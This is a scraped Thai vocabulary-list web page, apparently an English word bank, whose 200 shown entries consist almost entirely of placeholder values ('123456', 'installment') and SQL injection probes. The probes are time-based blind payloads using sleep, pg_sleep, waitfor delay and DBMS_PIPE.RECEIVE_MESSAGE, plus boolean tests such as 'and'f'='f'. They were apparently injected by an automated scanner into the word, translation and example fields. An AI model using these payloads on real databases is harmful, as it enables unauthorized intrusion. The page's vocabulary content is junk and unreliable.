คำศัพท์ ประเภท คำแปล หมายเหตุ
ตัวอย่างประโยค
ที่มา :


เกมส์ฝึกจำคำศัพท์   |   เกมส์ฝึกจำประเภทของคำศัพท์


   ค้นหา * กดปุ่มนี้เพื่อ Refresh ข้อมูลได้คำศัพท์

ตอนนี้มีคำศัพท์สะสมรวมทั้งหมด 816 คำ    จากทั้งหมด 3142 ตัวอย่าง


คำศัพท์ แปลว่า ตัวอย่างประโยค ที่มา
1 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('u',18)='u 123456 : 123456
28-07-2566
2 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',0)='g 123456 : 123456
28-07-2566
3 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('v',18) 123456 : 123456
28-07-2566
4 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('p',0) 123456 : 123456
28-07-2566
5 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456'and(select+1)>0waitfor/**/delay'0:0:18 123456 : 123456
28-07-2566
6 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456'and(select+1)>0waitfor/**/delay'0:0:0 123456 : 123456
28-07-2566
7 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456/**/and(select+1)>0waitfor/**/delay'0:0:18'/**/ 123456 : 123456
28-07-2566
8 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/ 123456 : 123456
28-07-2566
9 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456'/**/and(select'1'from/**/pg_sleep(18))::text>'0 123456 : 123456
28-07-2566
10 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0 123456 : 123456
28-07-2566
11 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456/**/and(select+1/**/from/**/pg_sleep(18))>0/**/ 123456 : 123456
28-07-2566
12 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/ 123456 : 123456
28-07-2566
13 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456"and(select*from(select+sleep(18))a/**/union/**/select+1)=" 123456 : 123456
28-07-2566
14 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 123456 : 123456
28-07-2566
15 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456'and(select*from(select+sleep(18))a/**/union/**/select+1)=' 123456 : 123456
28-07-2566
16 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 123456 : 123456
28-07-2566
17 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
(select*from(select+sleep(18)union/**/select+1)a) 123456 : 123456
28-07-2566
18 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
(select*from(select+sleep(0)union/**/select+1)a) 123456 : 123456
28-07-2566
19 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456"and"s"="k 123456 : 123456
28-07-2566
20 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456"and"b"="b 123456 : 123456
28-07-2566
21 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456'and'y'='w 123456 : 123456
28-07-2566
22 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456'and'f'='f 123456 : 123456
28-07-2566
23 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456/**/and+0=7 123456 : 123456
28-07-2566
24 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456/**/and+2=2 123456 : 123456
28-07-2566
25 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 (select*from(select+sleep(18)union/**/select+1)a) : 123456
28-07-2566
26 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 (select*from(select+sleep(0)union/**/select+1)a) : 123456
28-07-2566
27 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456"and"l"="n : 123456
28-07-2566
28 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456"and"n"="n : 123456
28-07-2566
29 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 0 : 123456
28-07-2566
30 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 1 : 123456
28-07-2566
31 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456/**/and+4=8 : 123456
28-07-2566
32 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456/**/and+2=2 : 123456
28-07-2566
33 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
34 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
35 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
36 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
37 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
38 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('w',12)='w 123456 : 123456
28-07-2566
39 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : (select*from(select+sleep(18)union/**/select+1)a)
28-07-2566
40 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('e',0)='e 123456 : 123456
28-07-2566
41 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : (select*from(select+sleep(0)union/**/select+1)a)
28-07-2566
42 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('e',12) 123456 : 123456
28-07-2566
43 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456"and"r"="u
28-07-2566
44 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('u',0) 123456 : 123456
28-07-2566
45 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456"and"b"="b
28-07-2566
46 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456'and(select+1)>0waitfor/**/delay'0:0:12 123456 : 123456
28-07-2566
47 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 0
28-07-2566
48 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456'and(select+1)>0waitfor/**/delay'0:0:0 123456 : 123456
28-07-2566
49 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 1
28-07-2566
50 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456/**/and(select+1)>0waitfor/**/delay'0:0:12'/**/ 123456 : 123456
28-07-2566
51 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456/**/and+1=6
28-07-2566
52 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/ 123456 : 123456
28-07-2566
53 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456/**/and+4=4
28-07-2566
54 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456'/**/and(select'1'from/**/pg_sleep(12))::text>'0 123456 : 123456
28-07-2566
55 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('x',18)='x
123456 123456 : 123456
28-07-2566
56 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0 123456 : 123456
28-07-2566
57 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',0)='g
123456 123456 : 123456
28-07-2566
58 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456/**/and(select+1/**/from/**/pg_sleep(12))>0/**/ 123456 : 123456
28-07-2566
59 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('r',18)
123456 123456 : 123456
28-07-2566
60 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/ 123456 : 123456
28-07-2566
61 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('f',0)
123456 123456 : 123456
28-07-2566
62 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456"and(select*from(select+sleep(12))a/**/union/**/select+1)=" 123456 : 123456
28-07-2566
63 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456'and(select+1)>0waitfor/**/delay'0:0:18
123456 123456 : 123456
28-07-2566
64 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 123456 : 123456
28-07-2566
65 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456'and(select+1)>0waitfor/**/delay'0:0:0
123456 123456 : 123456
28-07-2566
66 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456'and(select*from(select+sleep(12))a/**/union/**/select+1)=' 123456 : 123456
28-07-2566
67 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456/**/and(select+1)>0waitfor/**/delay'0:0:18'/**/
123456 123456 : 123456
28-07-2566
68 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 123456 : 123456
28-07-2566
69 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
123456 123456 : 123456
28-07-2566
70 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
(select*from(select+sleep(12)union/**/select+1)a) 123456 : 123456
28-07-2566
71 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456'/**/and(select'1'from/**/pg_sleep(18))::text>'0
123456 123456 : 123456
28-07-2566
72 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
(select*from(select+sleep(0)union/**/select+1)a) 123456 : 123456
28-07-2566
73 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456 123456 : 123456
28-07-2566
74 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456"and"g"="k 123456 : 123456
28-07-2566
75 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456/**/and(select+1/**/from/**/pg_sleep(18))>0/**/
123456 123456 : 123456
28-07-2566
76 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',2)='z
123456 123456 : 123456
28-07-2566
77 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',0)='g
123456 123456 : 123456
28-07-2566
78 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('e',2)
123456 123456 : 123456
28-07-2566
79 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456"and"e"="e 123456 : 123456
28-07-2566
80 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('r',0)
123456 123456 : 123456
28-07-2566
81 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456'and(select+1)>0waitfor/**/delay'0:0:2
123456 123456 : 123456
28-07-2566
82 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456'and(select+1)>0waitfor/**/delay'0:0:0
123456 123456 : 123456
28-07-2566
83 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
123456 123456 : 123456
28-07-2566
84 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
123456 123456 : 123456
28-07-2566
85 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
123456 123456 : 123456
28-07-2566
86 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
123456 123456 : 123456
28-07-2566
87 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456'and'g'='y 123456 : 123456
28-07-2566
88 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456 123456 : 123456
28-07-2566
89 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456"and(select*from(select+sleep(18))a/**/union/**/select+1)="
123456 123456 : 123456
28-07-2566
90 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
123456 123456 : 123456
28-07-2566
91 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
123456 123456 : 123456
28-07-2566
92 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456 123456 : 123456
28-07-2566
93 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
123456 123456 : 123456
28-07-2566
94 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456'and'l'='l 123456 : 123456
28-07-2566
95 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
123456 123456 : 123456
28-07-2566
96 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456 123456 : 123456
28-07-2566
97 installment  123456    แก้ไขข้อมูล   0% (0/0)
(select*from(select+sleep(2)union/**/select+1)a)
123456 123456 : 123456
28-07-2566
98 installment  123456    แก้ไขข้อมูล   0% (0/0)
(select*from(select+sleep(0)union/**/select+1)a)
123456 123456 : 123456
28-07-2566
99 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456"and"t"="g
123456 123456 : 123456
28-07-2566
100 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456"and"c"="c
123456 123456 : 123456
28-07-2566
101 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456'and'h'='z
123456 123456 : 123456
28-07-2566
102 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456/**/and+3=8 123456 : 123456
28-07-2566
103 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456'and'n'='n
123456 123456 : 123456
28-07-2566
104 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456/**/and+1=5
123456 123456 : 123456
28-07-2566
105 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456/**/and+3=3
123456 123456 : 123456
28-07-2566
106 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456'and(select*from(select+sleep(18))a/**/union/**/select+1)='
123456 123456 : 123456
28-07-2566
107 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
108 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
109 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
110 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
111 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
112 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
113 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
114 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
115 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456/**/and+4=4 123456 : 123456
28-07-2566
116 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
117 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
123456 123456 : 123456
28-07-2566
118 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
119 123456  123456    แก้ไขข้อมูล   0% (0/0)
(select*from(select+sleep(18)union/**/select+1)a)
123456 123456 : 123456
28-07-2566
120 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
121 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
122 123456  123456    แก้ไขข้อมูล   0% (0/0)
(select*from(select+sleep(0)union/**/select+1)a)
123456 123456 : 123456
28-07-2566
123 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
124 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456'and'q'='w
123456 123456 : 123456
28-07-2566
125 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456'and's'='s
123456 123456 : 123456
28-07-2566
126 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 (select*from(select+sleep(12)union/**/select+1)a) : 123456
28-07-2566
127 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
128 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
129 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456/**/and+2=7
123456 123456 : 123456
28-07-2566
130 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
131 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
132 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 (select*from(select+sleep(0)union/**/select+1)a) : 123456
28-07-2566
133 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
134 installment n.  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
135 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456/**/and+1=1
123456 123456 : 123456
28-07-2566
136 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
137 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456/**/and+0=0 : 123456
28-07-2566
138 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
139 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : (select*from(select+sleep(0)union/**/select+1)a)
28-07-2566
140 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456/**/and+2=2
28-07-2566
141 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
142 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456 123456 : 123456
28-07-2566
143 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
144 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
145 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456/**/and(select+1/**/from/**/pg_sleep(12))>0/**/
123456 123456 : 123456
28-07-2566
146 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
147 123456  (select*from(select+sleep(18)union/**/select+1)a)    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
148 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
149 123456  (select*from(select+sleep(0)union/**/select+1)a)    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
150 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
123456 123456 : 123456
28-07-2566
151 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
152 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
153 123456  123456"and"y"="m    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
154 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('x',2)='x 123456 : 123456
28-07-2566
155 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456"and(select*from(select+sleep(12))a/**/union/**/select+1)="
123456 123456 : 123456
28-07-2566
156 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('d',0)='d 123456 : 123456
28-07-2566
157 123456  123456"and"f"="f    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
158 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('b',2) 123456 : 123456
28-07-2566
159 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('a',0) 123456 : 123456
28-07-2566
160 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456 123456 : 123456
28-07-2566
161 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456'and(select+1)>0waitfor/**/delay'0:0:2 123456 : 123456
28-07-2566
162 123456  0    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
163 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456'and(select+1)>0waitfor/**/delay'0:0:0 123456 : 123456
28-07-2566
164 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/ 123456 : 123456
28-07-2566
165 123456  1    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
166 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456'and(select*from(select+sleep(12))a/**/union/**/select+1)='
123456 123456 : 123456
28-07-2566
167 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0 123456 : 123456
28-07-2566
168 123456  123456/**/and+2=6    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
169 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
170 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0 123456 : 123456
28-07-2566
171 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
172 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
173 123456  123456    แก้ไขข้อมูล   0% (0/0)
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
123456 123456 : 123456
28-07-2566
174 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
175 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
176 installment n.  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
177 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/ 123456 : 123456
28-07-2566
178 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
179 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
180 123456  123456/**/and+4=4    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
181 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/ 123456 : 123456
28-07-2566
182 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
183 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)=" 123456 : 123456
28-07-2566
184 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
185 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
186 123456  123456    แก้ไขข้อมูล   0% (0/0)
(select*from(select+sleep(12)union/**/select+1)a)
123456 123456 : 123456
28-07-2566
187 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
188 123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('p',18)='p  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 : 123456
28-07-2566
189 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 123456 : 123456
28-07-2566
190 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
191 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
192 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
193 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
194 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)=' 123456 : 123456
28-07-2566
195 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
196 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
197 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
198 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566
199 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 123456 : 123456
28-07-2566
200 installment  123456    แก้ไขข้อมูล   0% (0/0)
123456
123456 123456 : 123456
28-07-2566